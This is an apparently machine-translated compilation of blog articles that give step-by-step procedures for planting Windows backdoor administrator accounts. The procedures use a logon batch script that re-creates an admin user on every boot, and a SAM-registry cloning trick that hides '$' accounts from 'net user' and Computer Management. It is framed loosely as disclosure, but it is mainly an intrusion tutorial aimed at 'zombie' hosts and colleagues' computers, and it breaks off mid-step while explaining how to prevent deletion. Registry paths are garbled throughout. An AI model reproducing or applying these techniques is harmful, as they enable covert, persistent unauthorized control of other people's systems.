Establishment and detection of super-hidden server accounts

1. Create an administrator user that can never be deleted

Procedure:
1. Create a. txt file on your computer.
2. Enter content in it

@ Echo off
Net user xixi 123456/add Note: The first xixi is the user name and the second 123456 is the password;
Net localgroup administrators xixi/add

3. Save the file and change the suffix to xixi. bat. Note: The name is casual and the format must be bat;
4. copy the file to the C: WINNTsystem32GroupPolicyUserScriptsLogon file directory of the other computer. If not, create the file by yourself.
Finished. The next time the other computer has this administrator account, deleted, and started again!
If you change the content
@ Echo off
Net user administrator 123456/add

It means that no matter how you change the password, the next time you start the administrator account, the administrator password will be 123456.

2. I think the above method is not ideal. It would be better to use the hidden account method to create an account.
Procedure:
1. First, create an account with a "$" sign at the end. If saturn $ is used, delete the account with the password.
2. Save the following code as the (. reg) Registry
The Code is as follows:
-------------------------------------------------------------------------------
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHONESAMSAMDomainsAccountusers
Namessaturn $]
@ = Hex (1f4 ):
-------------------------------------------------------------------------------
Note: 1f4 is the hexadecimal value of the Administrator account.
3. Save and import the data. Run the CMD command to set the password.
Net user saturn $123456

An invisible account is created, and the user cannot see this account in the "local user and group. Therefore, no account is deleted. Remember not to stick to your colleagues' computers. If it is found out ..... Hey :-)

This article is from bkjia.com technical blog

 

Hide the Administrator account in three minutes.

Regedt32.exe can be used to set permissions for registry keys. Nt/2000/xp account information is stored in the HKEY_LOCAL_MACHINE \ SAM key of the Registry, except for the SYSTEM user, other users do not have the permission to access the internal information. For this reason, we first set the "full control" permission to the SAM key using regedt32.exe. In this way, you can read and write the information in the SAM key. The steps are as follows:

1. Assume that we log on to a zombie with terminal services as a Super User administrator. First, create an account under the command line or account manager: hacker $, here I create this account in the command line. net user hacker $1234/add

2. Enter regedt32.exein the "Start/Run" command to run regedt32.exe.

3. Click "permission" and a window will pop up. Click "add" to add my Logon account to the security bar. Here I log on as administrator, so I will add administrator, and set the permission to "full control ". Note: It is best to add the account you are logged on to or the group in which the account is located. do not modify the original account or group. Otherwise, a series of unnecessary problems may occur. And then click here to delete the account you added.

4. Click "start"> "run" and enter "regedit.exe" to go back and start the Registration Table editor regedit.exe. Open key: HKEY_LOCAL_MAICHINE \ SAM \ Domains \ account \ user \ names \ hacker $"

5. Export the items hacker $, 00000409, and 000001F4 as hacker. reg, 409.reg, 1f4. reg. use NotePad to edit the exported files respectively, and copy the value of the key "F" under the "000001F4" of the Super User, overwrite the value of the key "F" under item 00000409 corresponding to hacker $, and then replace 00000409. reg and hacker. reg merge.

6. Execute net user hacker $/del on the command line to delete user hacker $: net user hacker $/del

7. In the regedit.exe window, press F5 to refresh, and then press file-import registry file to import modified hacker. reg to registry.

The hacker of the hidden Super User has been created. Then, disable regedit.exe. In the regedt32.exe window, change the HKEY_LOCAL_MACHINE \ SAM Key Permission to the original one (you only need to delete the added account administrator ).

9. Note: After a hidden superuser is created, the hacker $ user cannot be seen in the account manager, and the hacker $ user cannot be seen in the command line by running the "net user" command, but after the superuser is created, you cannot change the password any more. If you use the net user command to change the password of hacker $, you will be able to see this hidden super user in the account manager and cannot delete it.

 

Create and delete hidden administrator accounts
When hackers intrude into a host, they will try to protect their "labor results". Therefore, they will leave various backdoors on the zombie to control the zombie for a long time, the most commonly used is the account hiding technology. Create a hidden account on the bot for use as needed. The account hiding technology is the most concealed backdoor. Generally, it is difficult for users to discover the existence of hidden accounts in the system, this article discloses the common technology used by hackers to hide accounts.

Before hiding the system account, we need to first learn how to view the existing account in the system. In the system, you can go to the "command prompt", control panel "Computer Management", and "Registry" to view existing accounts, administrators only check for exceptions in "command prompt" and "Computer Management". Therefore, how to hide system accounts in these two fields is the focus of this article.

I. Conspiracy in "command prompt"
In fact, it is not very advanced to create a hidden account in the system. You can use the "command prompt" that we usually use to create a simple hidden account.
Click Start> Run, Enter CMD to run the command prompt, enter net user piao $123456/add, and press Enter, "Command completed successfully" is displayed ". Enter "net localgroup administrators piao $/add" and press Enter. Then, we can use the "command prompt" to create a username named "piao $ ", A simple "hidden account" with a password of "123456" and escalate the hidden account to administrator permissions.
Let's see if the hidden account is successfully created. In the "command prompt", enter the "net user" command to view the system account. Press enter to display the account that exists in the current system. From the returned results, we can see that the "piao $" account we just created does not exist. Next, let's go to "Administrative Tools" on the control panel, open "computer", View "local users and groups", and in the "user" field, the hidden account "piao $" we created is undoubtedly exposed.
It can be concluded that this method can only hide the account in the "command prompt", while "Computer Management" is powerless. Therefore, this method of hiding accounts is not very practical. It is only valid for careless administrators. It is an entry-level system account hiding technology.

2. Hide accounts in the Registry
From the above, we can see that the method of hiding an account from a command prompt has obvious disadvantages and is easy to expose itself. Is there any technology that can hide accounts at the same time in "command prompt" and "Computer Management? The answer is yes, and all this requires a small setup in the registry, so that the system account can completely evaporate in the two.

1. Return to the peak and give the Administrator the registry operation permission.
In the registry, You need to modify the key value of the system account at "HKEY_LOCAL_MACHINESAMSAM". However, when we come here, we will find that the key value of the system account cannot be expanded. This is because the system gives the system administrator the "Write DAC" and "read control" permissions by default, and does not grant the modification permission, therefore, we cannot view and modify the key values under "SAM. However, you can use another Registry Editor in the system to grant the Administrator the modification permission.
Click Start> Run, enter restart regedt32.exe, and press Enter. Another Registry Editor is displayed ", unlike the "Registry Editor" that we usually use, it can modify the permission limit when the system account operates the Registry (for example, regedt32.exe ). Go to "HKEY_LOCAL_MACHINESAMSAM" in regedt32.exe and click "security"> "Permissions". In the displayed "SAM Permissions" edit window, select the "administrators" account, select "full control" in the permission settings section below, and click "OK. Then we switch back to the Registry Editor, and we can see that the key values under "HKEY_LOCAL_MACHINESAMSAM" can be expanded.
Tip: the method mentioned above applies only to Windows NT/2000 systems. In Windows XP, you can perform permission operations directly in the registry. You can right-click the item you want to set the permission and select "permission.

2. Steal the bar and replace the hidden account with the administrator.
After obtaining the registry operation permission, we can start to hide the creation of the account. Go to "HKEY_LOCAL_MACHINESAMSAM DomainsAccountUsersNames" in the Registry Editor. All existing accounts in the current system will be displayed here, including our hidden accounts. Click "piao $" of our hidden account, and the "type" item in the key value displayed on the right is 0x3e9. Go up to "HKEY_LOCAL_MACHINESAMSAMDomains AccountUsers, you can find the "000003E9" item, which corresponds to each other and hide all information of the Account "piao $" in "000003E9. Similarly, we can find that the corresponding item of the "administrator" account is "000001F4 ".
Export the key value of "piao $" to piao $. reg, and export the F key values of "000003E9" and "000001F4" to user. reg and admin. reg respectively. Use "Notepad" to open admin. reg, copy the content following the "F" value, replace the "F" value in user. reg, and save the content. Next, go to the "command prompt" and enter "net user piao $/del" to delete the hidden account we created. Finally, import piao $. reg and user. reg to the Registry. At this point, the Account creation is completed.

3. crossing the river to split the bridge and cut off the ways to delete hidden accounts
Although our hidden accounts have been hidden in "command prompt" and "Computer Management", experienced system administrators may still use the Registry Editor to delete our hidden accounts, so how can we make our hidden accounts rock solid?
Open “regedt32.exe and go to "HKEY_LOCAL_MACHINESAMSAM" to set